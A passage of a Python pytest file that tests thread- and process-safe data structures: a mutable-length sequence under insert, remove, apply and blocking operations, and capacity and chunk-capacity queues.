'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.remove.__name__), 'apply_params': ((csmlseq[1],), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.remove.__name__), apply_params=( (csmlseq_twin[1],), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 # 'remove' removes first occurrence }) }), 'max_check_count': 1 }), join=True) ], 
manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # insert fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.insert.__name__), 'apply_params': ((1, "sadfasfd",), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.insert.__name__), apply_params=( (1, "sadfasfd",), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # inser at end fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.insert.__name__), 'apply_params': ((init_len + 1000, "sadfasfd",), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.insert.__name__), apply_params=( (init_len + 123124, "sadfasfd",), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, 
csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # c_insert fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.c_insert.__name__), 'apply_params': ((1, ("sadfasfd", 3.4, 11),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((((csmlseq_twin[0],) + cast(Tuple[Any, ...], ("sadfasfd", 3.4, 11)) + tuple(csmlseq_twin[1:])),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # c_insert at end fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.c_insert.__name__), 'apply_params': ((init_len + 12312, ("sadfasfd", 3.4, 11),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=(((tuple(csmlseq_twin) + cast(Tuple[Any, ...], ("sadfasfd", 3.4, 11))),), {})) }) }), 'max_check_count': 1 }), join=True ), 
execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # apply - incr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.c_apply.__name__), 'apply_params': (None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_incr_len }), 'apply_check_result': (APPLY_RETURN,) # Must be a tuple of length 1! }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=__apply_helper, apply_params=(None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_incr_len }), apply_check_result=(APPLY_RETURN,)) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # apply - decr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), 
csmlseq.c_apply.__name__), 'apply_params': (None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_decr_len }), 'apply_check_result': (APPLY_RETURN,) # Must be a tuple of length 1! }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=__apply_helper, apply_params=(None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_decr_len }), apply_check_result=(APPLY_RETURN,)) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata fix_exec.c_join() # noinspection PyArgumentList def test_csmlseqdata_concurrent( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmlseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableLengthSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmlseq: csdata.Pr.CSMutableLengthSequence[Any] = cast(csdata.Pr.CSMutableLengthSequence[Any], fix_csmlseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) if fix_csl > cs.En.CSL.SINGLE_THREAD: # test_blocking - delete for del_name in (csmlseq.__delitem__.__name__, csmlseq.c_delete.__name__): # int index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': 
ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, del_name), 'params_1': ((1,), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # slice index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, del_name), 'params_1': ((slice(1, 3),), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, 
_max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - extend, iadd, c_extend for extend_name in (csmlseq.__iadd__.__name__, csmlseq.extend.__name__, csmlseq.c_extend.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=(csmlseq, extend_name), params=(((1, 2, "sadf"),), {}), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - append, c_append for append_name in (csmlseq.append.__name__, csmlseq.c_append.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 
'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, append_name), 'params_1': ((3342,), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - clear execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.clear.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - insert execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 
'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.insert.__name__), 'params_1': ((1, "sadf"), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - pop execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.pop.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata[-1],), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT 
- 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - remove execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.remove.__name__), 'params_1': ((csmlseq[1],), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - remove execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 
'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_insert.__name__), 'params_1': ((1, (2, 4, "sdf")), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata fix_exec.c_join() QUEUE_CAP: Final[int] = 10 FILL_ELEM: Final[str] = "ABCDEFGASDASDLSLSLSLSLALAEIOIQEGBASKFJBAKDLGJBAKDJBFAKLSD" def __c_fill_capqueue(queue: csdata.Pr.CSCapacityQueue[Any], full_timeout: Optional[float] = None) -> None: assert queue.c_capacity() == QUEUE_CAP assert queue.qsize() <= QUEUE_CAP for _ in range(QUEUE_CAP - queue.qsize()): queue.c_put(item=FILL_ELEM) assert queue.qsize() == QUEUE_CAP with pytest.raises(Full): queue.c_put(item=FILL_ELEM, blocking=False) if full_timeout is not None: with pytest.raises(Full): queue.c_put(item=FILL_ELEM, blocking=True, timeout=full_timeout) def __c_empty_capqueue(queue: csdata.Pr.CSCapacityQueue[TYPE], empty_timeout: Optional[float] = None) -> None: assert queue.c_capacity() == QUEUE_CAP assert queue.qsize() <= QUEUE_CAP for _ in range(queue.qsize()): queue.c_get() assert queue.qsize() == 0 with pytest.raises(Empty): queue.c_get(blocking=False) if empty_timeout is not None: with pytest.raises(Empty): queue.c_get(blocking=True, timeout=empty_timeout) def __c_put_all_in_capqueue(queue: csdata.Pr.CSCapacityQueue[Any], items: con.Pr.Sequence[Any]) -> None: assert c_assert_not_none(queue.c_capacity()) - queue.qsize() >= len(items) for item in items: queue.c_put(item=item) def __c_compare_all_in_capqueue(queue: csdata.Pr.CSCapacityQueue[Any], items: con.Pr.Sequence[Any]) -> None: assert queue.qsize() == len(items) 
for i in range(queue.qsize()): assert items[i] == queue.c_get() assert queue.empty() # noinspection PyArgumentList def test_cscapacityqueue(fix_csl: cs.En.CSL, fix_init_queue: con.Pr.SizedIterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_cscapacityqueue_factory: Callable[[cs.En.CSL, con.Pr.SizedIterable[TYPE], Optional[int], Optional[mp_mngr.SyncManager]], csdata.Pr.CSCapacityQueue[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_queue = con.Ca.c_to_seq(obj=fix_init_queue) assert len(fix_init_queue) <= QUEUE_CAP cs_cap_queue: Final[csdata.Pr.CSCapacityQueue[Any]] = fix_cscapacityqueue_factory( fix_csl, fix_init_queue, QUEUE_CAP, fix_manager ) execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.qsize.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': len(fix_init_queue)}) }), 'max_check_count': 1 }), join=True), execs.Im.ExecDelayedParams( func_or_obj_func=__c_fill_capqueue, params=((), { 'queue': cs_cap_queue, 'full_timeout': 4.0 }), join=True, min_sec=4.0, max_sec=7.0) ], manager=fix_manager, _min_sec=4.0, _max_sec=7.0) assert cs_cap_queue.full() assert cs_cap_queue.qsize() == QUEUE_CAP == cs_cap_queue.c_capacity() if fix_csl > cs.En.CSL.SINGLE_THREAD: execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecDelayedParams( func_or_obj_func=(cs_cap_queue, cs_cap_queue.c_get.__name__), params=None, join=False, in_delay=4.0), execs.Im.ExecDelayedParams( func_or_obj_func=(cs_cap_queue, cs_cap_queue.c_put.__name__), params=((), { 'item': FILL_ELEM }), join=True, min_sec=3.0, max_sec=5.0) ], manager=fix_manager, _min_sec=3.0, _max_sec=5.0) assert cs_cap_queue.full() assert cs_cap_queue.qsize() == QUEUE_CAP == cs_cap_queue.c_capacity() execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ 
execs.Im.ExecDelayedParams( func_or_obj_func=__c_empty_capqueue, params=((), { 'queue': cs_cap_queue, 'empty_timeout': 4.0 }), join=True, min_sec=4.0, max_sec=7.0) ], manager=fix_manager, _min_sec=4.0, _max_sec=7.0) assert cs_cap_queue.empty() assert cs_cap_queue.qsize() == 0 if fix_csl > cs.En.CSL.SINGLE_THREAD: execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecDelayedParams( func_or_obj_func=(cs_cap_queue, cs_cap_queue.c_put.__name__), params=((), { 'item': FILL_ELEM }), join=False, in_delay=4.0), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.c_get.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True, min_sec=3.0, max_sec=5.0) ], manager=fix_manager, _min_sec=3.0, _max_sec=5.0) assert cs_cap_queue.empty() assert cs_cap_queue.qsize() == 0 execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=__c_put_all_in_capqueue, params=((), { 'queue': cs_cap_queue, 'items': fix_init_queue }), join=True), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.qsize.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': len(fix_init_queue)}) }), 'max_check_count': 1 }), join=True), execs.Im.ExecParams( func_or_obj_func=__c_compare_all_in_capqueue, params=((), { 'queue': cs_cap_queue, 'items': fix_init_queue }), join=True), ], manager=fix_manager) fix_exec.c_join() # noinspection PyArgumentList def test_cschunkcapacityqueue( fix_csl: cs.En.CSL, fix_manager: Optional[mp_mngr.SyncManager], fix_cschunkcapacityqueue_factory: Callable[[cs.En.CSL, con.Pr.SizedIterable[Any], Optional[int], Optional[int], Optional[int], Optional[mp_mngr.SyncManager]], 
csdata.Pr.CSCapacityQueue[Any]], fix_exec: execs.Im.Exec) -> None: cs_cap_queue: csdata.Pr.CSCapacityQueue[Any] with pytest.raises(ValueError): fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, -1, None, fix_manager) with pytest.raises(ValueError): fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, 0, -22, fix_manager) with pytest.raises(ValueError): fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, 22, 21, fix_manager) cs_cap_queue = fix_cschunkcapacityqueue_factory( fix_csl, cast(con.Pr.SizedIterable[Any], ()), QUEUE_CAP, 4, 4, fix_manager) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5, 5, 6)) cs_cap_queue.c_put((3, 4, 5, 5)) execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.c_get.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((), { 'el': (3, 4, 5, 5) }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager) cs_cap_queue = fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, 4, 6, fix_manager) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5, 5, 6, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5, 5, 6, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5, 5, 6, 5, 6)) cs_cap_queue.c_put((3, 4, 5, 5)) execs.Ca.c_exec_multiple(csl=fix_csl, 
exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.c_get.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((), { 'el': (3, 4, 5, 5) }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager) fix_exec.c_join()
42.72606
118
0.327201
